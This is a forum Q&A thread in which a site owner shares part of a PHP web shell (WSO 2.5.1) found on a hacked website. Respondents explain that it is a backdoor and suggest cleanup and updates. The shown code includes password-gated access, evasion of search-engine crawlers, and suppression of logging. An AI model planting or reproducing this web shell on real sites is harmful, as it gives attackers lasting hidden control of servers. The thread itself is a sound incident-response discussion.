# What is the effect of this php file found on a hacked website?

Tags: php

A website was hacked and I found a strange new php file on it. I have already deleted all the files and the database before changing the host credentials, but I would like to know what else should I be double-check before going back live with a backup?

Are there any other extra measures to be taken for the future - as in: how do I find how it got there?

Here is a piece of code and the pastebin since the code is too long:

```
<?php
$auth_pass = "fadf17141f3f9c3389d10d09db99f757";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5.1');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win")
    $os = 'win';
else
    $os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
    @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
```

https://pastebin.com/J37Xvk9v

Comment: I prefer using this to detect the OS `if(false !== strpos(strtoupper(php_uname('s')),'WIN')){` but yea ... it's a backdoor so they can upload stuff to your site, most likely.  I have to get back to creating the most powerful `RecursiveDirectoryIterator` know to any PHP programmer... lol

Comment: one thing I would suggest doing, as long as it doesn't break your site. is to disable `eval` - but they are checking that setting  `ini_get('disable_functions')`

Comment: Your using wordpress aren't you :), `update it`  check this out https://www.reddit.com/r/webdev/comments/2lgtsb/php_wordpress_exploit_code_what_does_it_do/

Answer (score 0):

This is a backdoor. Hackers can acces this page(php file) to enter commands on your server. This way they can hack you again even when you change your password.

Always delete such files and there is a optertunity he hided more pages like these.

Comment: Do you know how could I determine the way they got inside to upload that backdoor?

Comment: What CMS are you using and what version?  we have an old Joomla one at work that keeps getting hacked, we're in the process of replacing it so we just patch it up whenever they hack it ... lol ... yea yea I know, I told the boss we should take it down, but it's on a crappy server all by itself and there's nothing worth stealing on it. ( it doesn't even have logins for users besides Joomla for editing content )

Comment: The last time they hacked it they used the favicon.ico to store their code in ... noobs ... like I wouldn't find it there.  We have a script running that tells us if any files are changed ( don't tell the hackers it's our little secret . ok )

Comment: @mrwhite most likely it's a CMD which you are running like Wordpress or Joomla. Make sure your using the latest version! old versions have some secuirity problems. And also please accept this answer if i did answer your question.